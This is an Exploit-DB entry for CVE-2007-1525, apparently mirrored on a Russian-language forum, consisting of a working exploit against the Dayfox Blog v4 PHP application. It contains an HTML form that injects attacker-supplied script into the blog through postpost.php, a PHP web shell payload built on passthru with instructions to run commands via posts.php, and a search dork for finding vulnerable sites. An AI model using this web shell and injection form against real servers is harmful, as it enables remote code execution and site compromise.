- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 3478
- Проверка EDB
-
- Пройдено
- Автор
- DJ7XPL
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-1525
- Дата публикации
- 2007-03-14
HTML:
<html>
<!--
.-""""""""-.
/ Dj7xpl \
| |
|, .-. .-. ,|
| )(_o/ \o_)( |
|/ /\ \|
(@_ (_ ^^ _)
_ ) \_______\__|IIIIII|__/_______________________________
(_)@8@8{}<________|-\IIIIII/-|________________________________>
)_/ \ /
(@
+_______________________________________________Iranian Are The Best In World___________________________________________+
#
#
# Portal : Dayfox Blog V 4
# Download : http://www.dayfoxdesigns.co.nr
# Dork : "Powered by Dayfox Designs"
# Author : Dj7xpl | [email protected]
# Risk : High (Remote Code Execution)
#
+_______________________________________________________________________________________________________________________+
+_______________________________________________________________________________________________________________________+
#
#
# 1- Insert Your Script In Text File By This Exploit Example: <?php passthru($_GET[cmd]); ?>
# 2- include Text File By (Posts.php) Example: http://localhost/dfblog/posts.php?cmd=ls -la
#
#
+_______________________________________________________________________________________________________________________+
+_______________________________________________________________________________________________________________________+
#
#
# Sp Tnx : Milw0rm, Ashiyane, Delta Hacking, Virangar, Hacker.ir, Shabgard.org,Simorgh .............
#
#
+_______________________________________________________________________________________________________________________+
-->
<head><title>--======Dj7xpl======--</title></head>
<body background=http://dj7xpl.by.ru/img/scan.gif>
<center>
<form action="http://[Target]/[path]/postpost.php" method="post">
<input type="hidden" name="title" value="Dj7xpl" />
<input type="hidden" name="blog" value="script" /><br><br>
<font color=#C0FF3E size=+1>your script:<br>
<textarea name="cat"></textarea>
<input type="hidden" name="date" value="Hello All" />
<input type="hidden" name="catyear" value="dj7xpl" />
<input type="hidden" name="catmonth" value"dj7xpl" />
<input type="submit" value="write" />
</form>
</center>
</body
</html>
# milw0rm.com [2007-03-14]
- Источник
- www.exploit-db.com